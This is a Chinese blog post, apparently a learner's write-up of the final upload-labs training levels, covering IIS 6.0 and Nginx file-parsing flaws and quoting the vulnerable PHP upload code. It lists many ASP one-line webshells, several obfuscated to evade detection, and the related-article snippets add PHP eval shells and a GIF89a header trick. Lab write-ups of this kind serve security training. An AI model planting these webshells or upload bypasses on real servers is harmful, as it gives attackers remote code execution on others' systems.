文件上传(最后几题)

最新推荐文章于 2023-07-13 12:45:00 发布
最新推荐文章于 2023-07-13 12:45:00 发布
阅读量1.9k 收藏
点赞数 1
分类专栏: 小白入坑 笔记 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46601374/article/details/122440970
版权

IIS6.0解析漏洞

IIS6.0解析漏洞,其实有一些不如说是IIS6.0的一些特性,严格意义上而言,只是一些默认配置并不是漏洞 但是也有一些的确是漏洞

IIS6.0解析漏洞(一):

IIS6.0除了将ASP后缀当做ASP进行解析的同时,当文件后缀名字为.asa .cer .cdx 也会当做asp去解析,这是因为IIS6.0在应用程序扩展中默认设置了.asa .cer .cdx 都会调用 asp.dll

IIS6.0解析漏洞(二):

IIS5.1和IIS7.5无此漏洞。 IIS 6.0在处理含有特殊符号的文件路径时会出现逻辑错误,从而造成文件解析漏洞。这一漏洞有两种完全不同的利用方式:       

test.asp;.jpg   他将当做asp进行解析     

test.asp/123.jpg 他将当做asp进行解析

请求 /aaa.asp;xxxx.jpg

N1:从头部查找查找 "."号,获得 .asp;xxxx.jpg

N2:查找";"号,如果有则内存截断

N3:查找"/",如果有则内存截断

最终,将保留下来 .asp 字符串,从META_SCRIPT_MAP脚本映射表里与扩展名匹配对比,并反馈给了asp.dll处理

进入靶场,快点来吧!!!!

upload-labshttp://zmie8016.ia.aqlab.cn/Pass-20/index.php?action=show_code

看源码:

$allowedExts = array("gif", "jpeg", "jpg", "png","asa","cer","cdx");
$temp = explode(".", $_FILES["file"]["name"]);
echo $_FILES["file"]["size"];
$extension = end($temp);     // 获取文件后缀名
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/jpg")
|| ($_FILES["file"]["type"] == "image/pjpeg")
|| ($_FILES["file"]["type"] == "image/x-png")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 204800)   // 小于 200 kb
&& in_array($extension, $allowedExts))
{
    if ($_FILES["file"]["error"] > 0)
    {
        echo "错误:: " . $_FILES["file"]["error"] . "";
    }
    else
    {
        echo "上传文件名: " . $_FILES["file"]["name"] . "";
        echo "文件类型: " . $_FILES["file"]["type"] . "";
        echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB";
      
        if (file_exists("./a/image/" . $_FILES["file"]["name"]))
        {
            echo $_FILES["file"]["name"] . " 文件已经存在。 ";
        }
        else
        {
            // 如果 upload 目录不存在该文件则将文件上传到 upload 目录下
            $ret = move_uploaded_file($_FILES["file"]["tmp_name"], "image/" . $_FILES["file"]["name"]);
            echo "文件存储在: " . "./a/image/" . $_FILES["file"]["name"];
        }
    }
}
else
{
    echo "非法的文件格式";
}

 IIS6.0除了将ASP后缀当做ASP进行解析的同时,当文件后缀名字为.asa、.cer、.cdx也会当做asp去解析
这是因为IIS6.0在应用程序扩展中默认设置了.asa、.cer、.cdx都会调用asp.dll

asp一句话木马

<%eval request("chopper")%>

<%execute request("chopper")%>

<%execute(request("chopper"))%>

<%ExecuteGlobal request("chopper")%>

<%Eval(Request(chr(35)))%>

<%dy=request("c")%><%Eval(dy)%> 

<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%> 

<% if Request("c")<>"" then ExecuteGlobal request("c") end if %>

<%execute request("c")%><%'<% loop <%:%>

< %'<% loop <%:%><%execute request("a")%>

<script language=vbs runat=server>eval(request("c"))</script> 

<script language=VBScript runat=server>execute request("#")</script> 

<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("c"))%>

<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>

<%execute(unescape("eval%20request%28%22aaa%22%29"))%>

UTF-7编码加密:

<%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

Script Encoder 加密  //密码c

<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==~b0~"+$E+kYvEmr#@!@*rJ~O4+x,36mEDn!VK4mV~Dn5!+dYvEmr#~n NPrW,SBMAAA==^#~@%>

但我用的是<%eval request("a")%>

 

 

 

 

 

 zKaQ-HatBI01Th

upload-labshttp://zmie8016.ia.aqlab.cn/Pass-21/index.php

$allowedExts = array("gif", "jpeg", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
echo $_FILES["file"]["size"];
$extension = end($temp);     // 获取文件后缀名
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/jpg")
|| ($_FILES["file"]["type"] == "image/pjpeg")
|| ($_FILES["file"]["type"] == "image/x-png")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 204800)   // 小于 200 kb
&& in_array($extension, $allowedExts))
{
    if ($_FILES["file"]["error"] > 0)
    {
        echo "错误:: " . $_FILES["file"]["error"] . "";
    }
    else
    {
        echo "上传文件名: " . $_FILES["file"]["name"] . "";
        echo "文件类型: " . $_FILES["file"]["type"] . "";
        echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB";
      
        if (file_exists("./b/image/" . $_FILES["file"]["name"]))
        {
            echo $_FILES["file"]["name"] . " 文件已经存在。 ";
        }
        else
        {
            // 如果 upload 目录不存在该文件则将文件上传到 upload 目录下
            $ret = move_uploaded_file($_FILES["file"]["tmp_name"], "image/" . $_FILES["file"]["name"]);
            echo "文件存储在: " . "./b/image/" . $_FILES["file"]["name"];
	    echo "";
        }
    }
}
else
{
    echo "非法的文件格式";

IIS 6.0在处理含有特殊符号的文件路径时会出现逻辑错误,从而造成文件解析漏洞
这一漏洞有两种完全不同的利用方式:
(1)3.asp;.jpg 他将当做asp进行解析
(2)test.asp/3.jpg 他将当做asp进行解析 

 

 

 

 

 

 

 zKaQ-Y34Y2ets

upload-labshttp://zmie8016.ia.aqlab.cn/Pass-22/index.php

$allowedExts = array("jpg");
$time = time();
$temp = explode(".", $_FILES["file"]["name"]);
echo $_FILES["file"]["size"];
$extension = end($temp);     // 获取文件后缀名
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/jpg")
|| ($_FILES["file"]["type"] == "image/pjpeg")
|| ($_FILES["file"]["type"] == "image/x-png")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 204800)   // 小于 200 kb
&& in_array($extension, $allowedExts))
{
    if ($_FILES["file"]["error"] > 0)
    {
        echo "错误:: " . $_FILES["file"]["error"] . "";
    }
    else
    {
        echo "上传文件名: " . $_FILES["file"]["name"] . "";
        echo "文件类型: " . $_FILES["file"]["type"] . "";
        echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB";
      
        if (file_exists("C:/Inetpub/wwwroot/c/image/a.asp/" .$time.".jpg"))
        {
            echo $_FILES["file"]["name"] . " 文件已经存在。 ";
        }
        else
        {
            // 如果 upload 目录不存在该文件则将文件上传到 upload 目录下
            $ret = move_uploaded_file($_FILES["file"]["tmp_name"], "image/a.asp/".$time.".jpg");
            echo "文件存储在: " . "./c/image/a.asp/".$time.".jpg";
            echo "";
        }
    }
}
else
{
    echo "非法的文件格式";
}

 只能上传jpg,那就先上传个带码的jpg

上传成功,但可以看到

 

 

 

 

zKaQ-Y1EHhm0O

upload-labshttp://zmie8016.ia.aqlab.cn/Pass-23/index.php

if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $allow_ext = array(".jpg",".jpeg",".png",".bmp",".gif");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传,仅允许[.jpg, .jpeg, .png, .bmp, .gif]!';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}

 php特有的CGI解析漏洞 Nginx默认以CGI的方式支持php解析的,普遍的做法是在Nginx配置文件中通过正则匹配设SCRIPT_FILENAME(绝对路径)

上传的是.jpg

查看的是.jpg/.php

 

 

 

 

总算结束,下次更难~~~ 

正在过坎
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入绕过
m0_47599604的博客
03-11 273
目录 asp木马收集 简单的aspx免杀 过狗的一句话 双写绕过 常见绕过思路 绕过空格的过滤 SQL注入防御 asp木马收集 <%eval request("chopper")%> <%execute request("chopper")%> <%execute(request("chopper"))%> <%ExecuteGlobal request("chopper")%> <%Eval(Request(chr(35
利用http漏洞获取权限
快递小哥的博客
12-31 660
环境:一台win3虚拟机 一台物理机 1. 保证物理机和虚拟机在同一网段且能相互ping通 2.在虚拟机上安装iis服务器 3.开放权限 4.在物理机桌面建立一个txt文件,里面内置木马 如:1.txt <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)...
ASP.NET Eval 求值运算的一些用法
01-01
<%# Bind(“Subject”) %> //绑定字段 <%# Container.DataItemIndex + 1%> //实现自动编号 <%# DataBinder.Eval(Container.DataItem, “[n]”) %> 通常使用的方法(这三个性能最好) <%# DataBinder.Eval(Container.DataItem, “ColumnName”) %> <%# DataBinder.Eval(Container.DataItem, “ColumnName”, null) %> <%# DataBinder.Eval(Container, “DataItem
Web安全-一句话木马
热门推荐
道阻且长,行则将至。
05-08 30万+
在很多的渗透过程中,渗透人员会上传一句话木马到目标web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?
GIF89a
weixin_59392781的博客
09-15 1896
GIF89a <script language="php">eval($_GET[shell])</script> 当不能使用php代码直接注入时可以改为phtml格式加入GIF89a(图片头文件欺骗),后台认为是图片,上传后再执行木马。
一句话木马的初识体验
OKAY_TC的博客
11-19 923
一句话小马: ASP:<% eval request("pass") %> PHP: <?php @eval($_POST['pass']); ?> <?php @assert(@_POST['pass'];)?> 大小马区别差异: 大马:代码量多,功能强大(cmd执行,磁盘权限等),使用上相对较复杂。 小马:代码量精简(...
一句话木马
qq_43623470的博客
01-11 2284
asp一句话木马 &lt;%eval request(“pass”)%&gt; &lt;%eval(Request.Item[“value”]%&gt; 木马解释 &lt;%execute(request(“pass”))%&gt; request(“pass”)接收客户端提交的数据,pass为执行命令的参数值。 eval/execute 函数执行客户端命令的内容 php一句话木马 &...
渗透测试 - 一句话大全_cracer-CSDN
m0_67888657的博客
07-13 113
一句话:可以插在网页任何ASP文件的最底部不会出错,比如index.asp里面也是可以的!加了判断的PHP一句话,与上面的ASP一句话相同道理,也是可以插在任何PHP文件的最底部不会出错!无防下载表,有防下载表可尝试插入以下语句突破的一句话。不用''的asp一句话。可以躲过雷客图的一句话。以下这个ASP一句话。不用双引号的一句话。
免杀一句话2
cc1988429的专栏
04-18 902
ASP系列         (密码是-7)     PHP系列             @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                   @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                   @$_/*-/*-*/(
php限制上传类型代码,php限制上传文件类型并保存上传文件
weixin_31764625的博客
03-16 178
下面的代码演示了php中如何获取用户上传的文件,并限制文件类型的一般图片文件,最后保存到服务器$allowedExts = array("gif", "jpeg", "jpg", "png");$extension = end(explode(".", $_FILES["file"]["name"]));if ((($_FILES["file"]["type"] == "image/gif")||...
Retrofit2.0 实现图文(参数+图片)上传方法总结
01-05
最近项目里用到了类似图文上传的功能,以前都是封装OkHttp的文件上传功能,这次想换个姿势,想用Retrofit2.0实现这样的功能,本来以为挺简单的,没想到进入了深坑,连续调整了好几种姿势都报了同一个错,接着网上...
Apache Commons fileUpload实现文件上传
09-24
下面举例介绍如何使用它的文件上传功能。 所使用的fileUpload版本为1.2,环境为Eclipse3.3+MyEclipse6.0。FileUpload 是基于 Commons IO的,所以在进入项目前先确定Commons IO的jar包(本文使用commons-io-1.3.2.jar...
asp.net面试题
05-27
不定项选择题(共14题,单选或多选): ... A.scriptB.bodyC.titleD....答:随便啦,想直接上传就直接上传,想打包成EXE就打包,看个人喜好. 19.如何理解.net中的垃圾回收机制。 答:GC?对象创建了总要清除啊,不然内存哪够用?
程序员考试刷题-OCAJP:这是我用来准备OCAJP7的总练习集。所有这些练习题都是按照从第一单元到最后一个单元的顺序排列的。每个java文件
07-07
程序员练习题 什么是OCAJP? Oracle Certified Professional Java Programmer 1 (OCAJP) 是 Java 技术的入门级程序员认证。 如果您是一名新手并且想要获得基础级别认证的程序员,那么 OCAJP 是适合您的考试。 为什么...
大学生数学建模竞赛B题-纸片拼接源码
最新发布
02-15
大学生数学建模竞赛B题 纸片拼接,也许会有考虑不周到的地方。 思路大致为:先找最左端的那一张小纸片,然后比较纸片1的最右侧像素值与纸片2最左侧像素值,依次比较,记录相同的个数, 在全部纸片中寻找最大相同个...
一句话木马的原理
枫梓林のBlog
04-22 6017
一句话木马的原理 文章目录一句话木马的原理0x00 前言0x01 解析 PHP 一句话木马的原理0x02 解析蚁剑连接一句话木马原理1.蚁剑2.使用蚁剑进行连接0x03 分析蚁剑连接原理0x04 加密的 ASP 一句话后门0x04 JSP一句话木马0x05 ASPX一句话 0x00 前言 常用的一句话后门工具分为 ASP、ASP.NET、JSP和 PHP 四种类型 0x01 解析 PHP 一句话木马的原理 常用一句话木马 php的一句话木马: <?php @eval($_POST['pass']);?
PHP基础-文件操作
chuanfulu3622的博客
08-08 189
文件引用 PHP文件可以引用另外一个文件的内容,使用方法为【include】或【require】 语法 include 'test.php'; 或者 require 'test.php'; 引用语句错误处理方式 语句名称 错误处理方式 require 生成一个致命错误(E_C...
某教程学习笔记(一):13、脚本木马原理
weixin_41489908的博客
02-25 631
我和她说,如果有天你要离开我,你就跟我掰手腕,赢了你就让你走,她说我那么瘦小怎么会赢。后来她真的要和我分手,我把右手放在桌子上,眼看我要赢的时候,她把左手放到右手上,我抬头看她咬着牙眼里含着泪,我知道她真得要离开我了。。。 ...
【Oracle】Oracle中chr()的含义
zclinux的博客
11-21 7318
oracle中chr含义 CHR(10)和 CHR(13)——在oracle都为换行 chr(32)——表示空格 DECLARE   v_a VARCHAR2(255);   v_b VARCHAR2(255); BEGIN   SELECT 'a' || chr(9) || 'b' INTO v_b FROM dual;   v_a := 'a  b'; --a和b之间是tab键
在D盘创建文件夹,命名为T+学号,例如:T11701112XX。文件夹中存放5个文件,按试题要求命名,包括:试题1的原理图文件,试题2的源程序文件和仿真生成的*.hex文件,试题3的源程序文件和仿真生成的*.hex文件。最后将文件夹压缩上传到服务器的upload文件夹中。 (1)用proteus软件绘制电路仿真图,如图1所示。电路元件名称见表1。要求:原理图文件命名为T1.DSN。 表1 LED控制电路图元件表 序号 元件名称 仿真库名称 备注 U1 80C51 Microprocessor ICs 微处理器库—>80C51 D1~D8 LED-RED Optoelectronics 光电元件库—>红色LED R1~R8 RES Resistors 电阻库—>电阻(需设置为200欧姆) C1、C2 AVX0402NPO22P Capacitors 电容库—>22P瓷片电容 C3 CAP-POL Capacitors 电容库—>10u电解电容 CRY1 CRYSTAL Miscellaneous 杂项库—>晶振(频率设置为12MHz)(3)编程实现如下功能:使用定时器1实现1S定时,使LED单色灯闪烁显示,在T1.DSN文件中仿真。要求:工程文件命名为T3,文件命名为T3.c或T3.asm。
06-10
抱歉,作为AI语言模型,我无法在本地直接操作您的计算机或软件。但我可以提供一些指导: 1. 打开D盘,右键单击空白区域,选择“新建...8. 上传压缩文件到服务器的upload文件夹中。 希望这些指导可以帮助您完成任务。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值